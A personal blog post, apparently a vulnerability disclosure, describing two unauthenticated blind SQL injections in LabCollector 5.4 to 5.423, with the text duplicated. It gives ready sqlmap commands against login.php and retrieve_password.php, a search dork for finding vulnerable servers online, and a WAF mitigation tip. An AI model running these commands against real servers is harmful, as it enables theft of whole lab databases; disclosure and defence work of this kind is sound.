Hi,
Welcome to my blog!
Have you used LabCollector, the all-in-one lab notebook and management platform? Yeah, maybe you've known it at school, college or university.
Unfortunately, LabCollector with the version from 5.4 to 5.423 has two SQL injections that you can extract any data inside the database without login.
The first one is on the login page at login.php. When you sign in, the client sends the parameter login which is your username to the server. However, LabCollector failed to validate it so you can inject SQL code to the username and get it executed on the database server (mostly LabCollector uses MySQL). You can use sqlmap to give it a try:
The second one is on the forgot password page at retrieve_password.php. Similar to the login page, LabCollector also failed to validate your username which passed via the parameter user_name. Let's use sqlmap again:
Do you want to find vulnerable LabCollector on the Internet? Let's use some Google Dork, for example:
"LabCollector v. 5.423"
Currently, there is no path available for these vulnerabilities yet. Therefore, if you own a vulnerable LabCollector server, you should take at least a WAF to protect it. There is a free but powerful one like mod_security.
The two SQL injections above are blind SQL injection, so the data exfiltration may be slow but if they don't patch or have a hotfix, finally attackers can get the whole database.
Note: you should you the latest sqlmap for the PoCs above because some old versions of sqlmap won't show success.
If you find it valuable, please share it with other people.
If you have any questions, please don't hesitate to ask me on Twitter or leave a comment.
Thank you for reading!
Welcome to my blog!
Have you used LabCollector, the all-in-one lab notebook and management platform? Yeah, maybe you've known it at school, college or university.
Unfortunately, LabCollector with the version from 5.4 to 5.423 has two SQL injections that you can extract any data inside the database without login.
The first one is on the login page at login.php. When you sign in, the client sends the parameter login which is your username to the server. However, LabCollector failed to validate it so you can inject SQL code to the username and get it executed on the database server (mostly LabCollector uses MySQL). You can use sqlmap to give it a try:
sudoka@sudoka:~$ python sqlmap.py -u "http(s)://[site's name]/[LabCollector's path]/login.php" --data="login=payload&pass=pass&action=login&Submit=Sign+In" -p login --dbms=MySQL
The second one is on the forgot password page at retrieve_password.php. Similar to the login page, LabCollector also failed to validate your username which passed via the parameter user_name. Let's use sqlmap again:
sudoka@sudoka:~$ python sqlmap.py -u "http(s)://[site's name]/[LabCollector's path]/retrieve_password.php" --data="user_name=payload&action=reset_validation" -p user_name --dbms=MySQL
Do you want to find vulnerable LabCollector on the Internet? Let's use some Google Dork, for example:
"LabCollector v. 5.423"
Currently, there is no path available for these vulnerabilities yet. Therefore, if you own a vulnerable LabCollector server, you should take at least a WAF to protect it. There is a free but powerful one like mod_security.
The two SQL injections above are blind SQL injection, so the data exfiltration may be slow but if they don't patch or have a hotfix, finally attackers can get the whole database.
Note: you should you the latest sqlmap for the PoCs above because some old versions of sqlmap won't show success.
If you find it valuable, please share it with other people.
If you have any questions, please don't hesitate to ask me on Twitter or leave a comment.
Thank you for reading!
Comments
Post a Comment